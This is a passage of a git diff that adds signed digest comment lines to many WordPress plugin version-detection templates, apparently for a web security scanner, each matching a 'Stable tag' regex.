a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..007f793a56 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ae41b0136b74a2bb5c43c42690bb77fe1be34a7d34c465606e1866cc8afa21702203ed847c16212a8a3f0839c6be588505081dcb4c8ebc94c819f0f1bb0753fb878:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..4163dd34b4 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5839e1b399cbd2b36529e7f075e7483a3c80c522484a4ece84f9f2d45ab67a6022100bbafb3fbd623b0db7dfb66161d96c3fc4ebce8c03cdca09f5b0160711c8a8dcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..91a823adda 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205fa6733826f9737d836ec50c6c361477c9facbbaea96523ac5481d36ada70a36022076bd74b033519285aa85694c69dda94e1d57b7f88d1b1c455b068c40ea5109d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..f7f8aedc2f 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202b8d9dc33310c641f1a192c7e6609b1134115a7382632ebc2330cde7efa9fa2902207a459ac158a028414b14329d1852368d8534f07cf242b0df77a35aed26d1b95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..eb605eda8e 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220186cad4cec9f0c7fa46b8dcd6fbd38079ca8a03abcdaf06010ca8a72ec9c2316022100e4544eb6ecc1156b0250dbaa2abefc2a7a43b51ac4a0b073832e0cfaa5d29e96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..63eda397d4 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220606112e5c179165426e34af89874e4e86861cb6e242af2cf2857af66637ba7ef022100dfa680598ec1f106e69438a7387c46d095f6b85036d3fc7f1b64dd04cd7ac7fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..eabf88ddb9 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203adf0f44fcc37071a8337a45aec77321ad36788a1701e8d5499ff6b1388219ca02206a19a99455666f28368f6cc4e2486ed042683123c6f1b7cde5a65386e743dda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..9580de33aa 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100863cf9094df89df4a3f304021704d6cd0b08addfd56c37e2242c3c6566acbc9f02203d13fa96c1dfe53d07ce4eb7bb8ab07f67a11bbf80b7f7612689e81c9a0eb18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..43b3bf11ff 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203b41f4bc0f03874e45e565ed3f9eb58ea829554b66c9efc6e868024c742c1981022100a74173d9048d84bb63727cfdd6cefe3858d314994a48ba1bb8461c66705f37b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..36a0dbdb55 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220343c8735af0c8a7559702176381c03cc4516d1ea71590e6af76e096ac9c6626202203ab9b1d9b3dee07ee5584ec4c0edcad2991496be50cb3519c584e5e647810ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..9ea8246471 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087f682a6cf889e23d920aada1176883cb3603f391cb288ad423072bea2a13b7802210095ec378ab5de993c37372ef75c3d9a15d348772d378edbbb60c5e6cdb0f58de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..6348dee29f 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e4767b6dc1a7edaa040c8c44cbc6fe8b1b698b8d6e28741218411fe5bdac2e34022100f8860376573a65bd6cba0ce118e57f8501e8afbca6024cf449cd66ec8ee2b1b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..6f3753bf4d 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd16b650d346cd70bdb02361b92ed3906328249dcd1054ecc0a331b36ae9438e02202bd06e10d51669be9bdef6a2574cef449924a6f0b4b98a871ddf6a05d3107d23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..0c5a2d4eec 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066b1b191263a96aa27caac086de3bddc0836dcc4040cca5a323124812ebd5bee022100de1f7e490c99fec16ed5802bdd8c7b59065b277721fdd6e0223e5609cd1b7de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..2fa60025b2 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5ec4e0dc1b223cdca940a1db721c2481c1685e5289d397ebb69a4bb0aa64765022019c8a03c792ee05d1c1ff411779a7e4a9293f52ffccb0d0d9b178ae83895bf01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..736097ba0d 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d4152f625a0cdb033642eb236fa99fc068e7c1d3fcf3d2a26d3348b3e2b5b6d4022100f14b3cf3e56a1af8fefe08d0bdb37fab3bb43ad574c9d338db7db4b6e7c8bc07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..f163553aad 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100982a748e17c781c518d3ee351dd83cf08d7bad3a533ec3e1a5548a5c2e966682022100e94a972c295690db33c638dcafcb1b7ee92c23675fb70c7d5c553202e613bbf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..b1a85bcdb0 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a7f4ca165b7fd90f2004d0a3287dd1cf2d79c71bd84b320a6732083e455b3e0022100cfb08d769379d0253742c0a8635cb465fe63d925bea9aa05bf84d225b0044bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..d2136cc12a 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022034f05000be07eaabcab7f70ac51b69f695993d3d7fbdb669866b62b84d826bdb022035b73834eb26e1f8042bc4c3b512723f5a283a185ff952dae7436322baa3fa76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..3ece35df48 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000f3c4082359daf7f83a7c93c1a34b364a546082a0dfb5eefac55cf7986716d10221009a764e16de307c9706a156ddaaabcbe0a63828414c26acb881ec721c9fce0918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..fa28c3f742 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059daf9857cfe2ffeac03f69dc9d552fcf2872de2ea9eafd1813f8e881bcbe70502200f308da24790b1c89d43626d51bd60949bcb3c9ae1deaa06e15132a512409944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..89ed6506d9 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f50d58c66261a4cc8b6990bbafd81f67372c1ce5191b0ee216ba08e415e4ad0022016996af41065314c0e71191577a699b1d6fe1d80594e03c3662e7801e00a828e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..81bb86ec93 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008de180336e5c8e6da24d43e5a4455a5925495557a6640febc4acc516c06f2756022100abd45773f60dad6d9d3315ae9ea6c8da9521c9a87f5184e8521edad0641170ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..5f84cffbe9 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022060aba6a7b807250fc038e008bc76a9855c855b3e52e0a2c27257d23a61b35ae2022100b45b8d87cfaae112257ac7c57f4654497b17de410d50e28ffc29e3f4e9e42716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..9fd108f837 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009bfd091b38b40e91020d9887fa334bb6a4ca171e29c2ed3fae970134d91fb043022100eed9df5f95270168343a16907cb819b1ca68535943a38feec1b0e204b9e0b8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..dc59cd19a1 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8002fbae4f94e2c94213f5ceb84c58121f24817393904ae9ca2f7d2b487de9602200addc5c1fea399f2e12d114e52ae27eea8d271aa3aa35756a1321ef03b27f8ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..0fe24c3896 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a0779d523b58a6c85cdb4c43a434551191dde11b62088456f26494dc6c092256022100f5a0ef41c22b2e0f60369a459c618d44046a2f5ec95099abefd5ccc376b392cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..8ce4238b4f 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b58f2ba44e3f21ba17d75f6eb15e2f6bf67d0b0d36a736d72fa4d8895988ac7c022100ce1acd6be0c7302a1a79ec38068c39531ce5a862b71d42abec1b79106afd9822:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..75af29d1dc 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203db2f9eee6275866e1b45f12542feaab914bcd8e10018a29f4459d14d277c22d0220555eeec29e152c773548daa5f4118f36ec6e25c998907494b8dafb0d7a16f937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..a626964883 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fef9dbc38615ab39f6a5827b69390295e6901b97fe8a2d86f06929181d4f90e10221009a2792f1701c59be86ed1dabb47ba4f18a650079936778529d828ed1788a8baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..1836eafd45 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d964ec6dcc22520d5ae98e3acb2844a4831d5c7c932070245a343785e1060409022100e941e13d597b463e96e01ab6aad8dff62b91dbd50a778378eea633062ba5896a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 3e1e79e004..c8b0159c09 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a489dcc880c505b1a8cd17fc271810afd19aa550cf8859effbf2dc5cc686884022100d67591a10cde5eeb0017204f2364138f0b71a53d2d1dd9897b0f2ec07b634b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..18176d3e9f 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022037888385a69c96812016bce046a0a3dfc6b8155627ccbf005aa3e2e2bef211d002204eeae3f7244ad49ea180d5716dcbd87b14fc185a461310715ba36989b1836acf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..0bfa0d3dcc 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022058470da86b331d6e4688ecbfabad626341111421b0989a0fce945e2712f8125c022100c76e7dfd56b5c3e6866c767808146f705e25f82a0265ad4270625283e4d1bef0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..993077eb74 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200beee5948afd38f9afd8fdeefa5c3e4beae66aa06e4bbebf0d900b6a673a8e0b02205c5f21af0f4ef9ec0c3b86339519b235a1442b19c63274d8d066e4a4765fec9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..f816f9c054 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009718266974443bea43aa3a4371eb72847b9370addca8862705f5391732bb19390221009f737a958591bf541ca9f3e46bb2c16819c3d6cd40268f42aeec11801fe7bc2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..1d3b631307 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098afdb117b842284a65673ccc3ace644ddbf35b3348d42250b7f8e63f404d88102206423d84f858f2a5c0bafadd0aa65ddd11fa4c9a0acf008c45895d46f4ef9cfc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..f21a36179f 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7a7fcb1c7a28d9369e391ec476871ecbabb5a097d3d758df13a6cc028948fd3022100a1ee5dcf108727d0f9b5028b80b23766ee7b95c85f9db9c905586083711e1aad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..7ef088ca91 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dd085c8ee6a30bd45f92d0953a1c29e189976122d0c5354877353b80a23230ea022045fd7bd231639305136c76bb1808ac6a0d24487c19a1ea22039161affe9769b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..90d27c72ff 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d94c6836ad68f103427581088b277586c93a9a7f507260e40b3e502723ce482022019d48380ea61b6cf79d1ad99536ac01217d8c38e1cd7e33e22c0447fb887deb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..bebbc7d0f8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cf94e8d18d741329b839ff1cf43ca2d918c1d3a3bda9ca1ed5d2a786abdfbba802207ca9b57babdf179220ffb44be68433d6fa7ee067df277626e500e7534b72d798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..f036bf347e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080f141caa1cb1666604738da5fa308b20c2897a6e4aea15c477f8c5db03572fe02205aab1922e090b7e4dedcb5dddc77a26e3d9453aec88fdd533748f70c98f48b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..3f153cca41 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acb7b97043977a4f344a352517f60c0ec7dbdec138fa0cc2c09b357665df23c90221009065262a21cd906de21310ae7c0cb102b5cc615af095b040c5c0dff131316b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..6c17779427 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b42b855fefb33fbe3d3b37b879c1e01e8d4ea79fee385fa0f7c8046476aa466022100f94c49fd9722e943b2a8dc9919fd51d5f129f39b4593dc314f32612d0e81c92a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..091e082566 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d556d23a112bd47b9ee6c8ebe6249e34c7eb5f0a4bf3c835687580fba3a4a814022100ca18889d2e72c066255ee1fe3076e763ec15d0e494a81e99c5b504db047f6a83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..a139c228ea 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a75955999371a81c29604b921f73178c1c9634bdfdfae0fd491d5d347475f55a0221009608ee1a38c9188b7858797ea15766e2ba302f0f5736935a312fca4a46b006cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..17a7d66d7d 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ 